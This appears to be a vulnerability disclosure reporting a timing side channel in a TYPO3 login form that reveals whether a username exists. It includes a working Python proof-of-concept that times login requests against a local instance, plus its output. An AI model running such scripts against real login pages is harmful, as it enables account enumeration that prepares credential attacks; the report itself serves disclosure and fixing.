Description

There is a significant timing difference in the login functionality for valid and invalid usernames.

Proof of Concept

1. Attempt a Login with a valid user and an invalid user and observe the difference in the response time

Here is a small test script (alternatively we can see the response time in Burp Repeater)

import requests

url = "http://127.0.0.1/typo3/login"
valid_user = {"username": "admin", "userident": "pw", "login_status": "login"}
invalid_user = {"username": "doesnotexist", "userident": "pw", "login_status": "login"}

for _ in range(3):
    r = requests.post(url, data=valid_user)
    print(r.elapsed.total_seconds())

print('---')

for _ in range(3):
    r = requests.post(url, data=invalid_user)
    print(r.elapsed.total_seconds())

Results:

$python3 timing.py 
0.800313
0.778877
0.77845
---
0.021644
0.020045
0.019803

We can see that there is a difference in response time of about 750ms. This of course depends on the hash function the password is hashed with. Note that the rate limit was disabled for this PoC.